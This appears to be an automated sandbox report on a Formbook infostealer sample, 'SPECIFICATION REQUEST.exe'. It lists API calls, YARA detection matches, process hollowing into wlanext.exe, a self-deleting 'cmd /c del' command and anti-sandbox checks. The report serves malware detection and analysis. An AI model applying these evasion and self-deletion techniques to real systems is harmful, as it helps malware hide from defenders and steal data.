Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309760 NtOpenProcess,	5_2_03309760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033097A0 NtUnmapViewOfSection,	5_2_033097A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309610 NtEnumerateValueKey,	5_2_03309610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309670 NtQueryInformationProcess,	5_2_03309670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0330AD30 NtSetContextThread,	5_2_0330AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309520 NtWaitForSingleObject,	5_2_03309520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309560 NtWriteFile,	5_2_03309560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033095F0 NtQueryInformationFile,	5_2_033095F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9D60 NtCreateFile,	5_2_005C9D60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9E10 NtReadFile,	5_2_005C9E10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9E90 NtClose,	5_2_005C9E90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9F40 NtAllocateVirtualMemory,	5_2_005C9F40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9D5A NtCreateFile,	5_2_005C9D5A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C9E0B NtReadFile,	5_2_005C9E0B

Detected potential crypto function

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_00F0B264	0_2_00F0B264
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_00F0C2B0	0_2_00F0C2B0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_00F09990	0_2_00F09990
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_00F0DF71	0_2_00F0DF71
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8E660	0_2_04E8E660
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8E0A8	0_2_04E8E0A8
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8E388	0_2_04E8E388
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8E098	0_2_04E8E098
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8E37A	0_2_04E8E37A
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8CCC8	0_2_04E8CCC8
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_04E8CCB8	0_2_04E8CCB8
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041D2B1	2_2_0041D2B1
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041DD4C	2_2_0041DD4C
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00409E40	2_2_00409E40
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00409E3C	2_2_00409E3C
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041E685	2_2_0041E685
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041DFA3	2_2_0041DFA3
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041D7B8	2_2_0041D7B8
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0110F900	2_2_0110F900
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01124120	2_2_01124120
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011C1002	2_2_011C1002
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011DE824	2_2_011DE824
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0111B090	2_2_0111B090
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011320A0	2_2_011320A0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D20A8	2_2_011D20A8
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D28EC	2_2_011D28EC
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D2B28	2_2_011D2B28
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0113EBB0	2_2_0113EBB0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011C03DA	2_2_011C03DA
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011CDBD2	2_2_011CDBD2
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D22AE	2_2_011D22AE
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D2D07	2_2_011D2D07
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01100D20	2_2_01100D20
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D1D55	2_2_011D1D55
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01132581	2_2_01132581
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D25DD	2_2_011D25DD
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0111D5E0	2_2_0111D5E0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0111841F	2_2_0111841F
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011CD466	2_2_011CD466
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011DDFCE	2_2_011DDFCE
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D1FF1	2_2_011D1FF1
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011CD616	2_2_011CD616
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01126E30	2_2_01126E30
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011D2EF7	2_2_011D2EF7
Source: C:\Windows\explorer.exe	Code function: 3_2_06D25A32	3_2_06D25A32
Source: C:\Windows\explorer.exe	Code function: 3_2_06D1DCF2	3_2_06D1DCF2
Source: C:\Windows\explorer.exe	Code function: 3_2_06D1DCEC	3_2_06D1DCEC
Source: C:\Windows\explorer.exe	Code function: 3_2_06D1C072	3_2_06D1C072
Source: C:\Windows\explorer.exe	Code function: 3_2_06D24862	3_2_06D24862
Source: C:\Windows\explorer.exe	Code function: 3_2_06D1C069	3_2_06D1C069
Source: C:\Windows\explorer.exe	Code function: 3_2_06D28A6F	3_2_06D28A6F
Source: C:\Windows\explorer.exe	Code function: 3_2_06D20B1F	3_2_06D20B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_06D28B0E	3_2_06D28B0E
Source: C:\Windows\explorer.exe	Code function: 3_2_06D23132	3_2_06D23132
Source: C:\Windows\explorer.exe	Code function: 3_2_06D20B22	3_2_06D20B22
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03392B28	5_2_03392B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032EA309	5_2_032EA309
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032EAB40	5_2_032EAB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032FEBB0	5_2_032FEBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033723E3	5_2_033723E3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033803DA	5_2_033803DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0338DBD2	5_2_0338DBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032FABD8	5_2_032FABD8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0337FA2B	5_2_0337FA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033922AE	5_2_033922AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03384AEF	5_2_03384AEF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032E4120	5_2_032E4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032CF900	5_2_032CF900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032E99BF	5_2_032E99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0339E824	5_2_0339E824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032EA830	5_2_032EA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03381002	5_2_03381002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032F20A0	5_2_032F20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033920A8	5_2_033920A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032DB090	5_2_032DB090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033928EC	5_2_033928EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03391FF1	5_2_03391FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0339DFCE	5_2_0339DFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032E6E30	5_2_032E6E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0338D616	5_2_0338D616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03392EF7	5_2_03392EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032C0D20	5_2_032C0D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03392D07	5_2_03392D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03391D55	5_2_03391D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032F2581	5_2_032F2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032DD5E0	5_2_032DD5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033925DD	5_2_033925DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_032D841F	5_2_032D841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0338D466	5_2_0338D466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B2D90	5_2_005B2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B2D87	5_2_005B2D87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B9E40	5_2_005B9E40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B9E3C	5_2_005B9E3C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B2FB0	5_2_005B2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CDFA3	5_2_005CDFA3

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 032CB150 appears 107 times
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: String function: 0110B150 appears 45 times

Sample file is different than original file name gathered from version info

Source: SPECIFICATION REQUEST.exe, 00000000.00000000.228552775.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoapName.dll2 vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.238523858.0000000005DE0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePositiveSign.dll< vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe, 00000002.00000002.275767247.0000000000768000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe, 00000002.00000002.276221751.00000000010A2000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe, 00000002.00000002.276435498.00000000011FF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SPECIFICATION REQUEST.exe
Source: SPECIFICATION REQUEST.exe	Binary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe

Uses 32bit PE files

Source: SPECIFICATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: SPECIFICATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@6/3

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SPECIFICATION REQUEST.exe.log

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
Source: unknown	Process created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'	Jump to behavior

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 0_2_00F0D4FC push E804D3FEh; ret	0_2_00F0D501
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00416852 push es; ret	2_2_00416854
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00417857 push cs; ret	2_2_00417858
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_004178B6 push FFFFFF85h; ret	2_2_004178BD
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00407994 push cs; iretd	2_2_00407997
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041CEB5 push eax; ret	2_2_0041CF08
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041CF6C push eax; ret	2_2_0041CF72
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041CF02 push eax; ret	2_2_0041CF08
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0041CF0B push eax; ret	2_2_0041CF72
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0040B736 push ebx; retf	2_2_0040B73E
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0115D0D1 push ecx; ret	2_2_0115D0E4
Source: C:\Windows\explorer.exe	Code function: 3_2_06D293E6 pushad ; ret	3_2_06D293E7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0331D0D1 push ecx; ret	5_2_0331D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C7857 push cs; ret	5_2_005C7858
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C6852 push es; ret	5_2_005C6854
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005C78B6 push FFFFFF85h; ret	5_2_005C78BD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CD90E push cs; iretd	5_2_005CD90F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005B7994 push cs; iretd	5_2_005B7997
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CDE03 push cs; retf	5_2_005CDE04
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CCEB5 push eax; ret	5_2_005CCF08
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CCF6C push eax; ret	5_2_005CCF72
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CCF0B push eax; ret	5_2_005CCF72
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005CCF02 push eax; ret	5_2_005CCF08
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_005BB736 push ebx; retf	5_2_005BB73E

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SPECIFICATION REQUEST.exe PID: 2952, type: MEMORY

Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
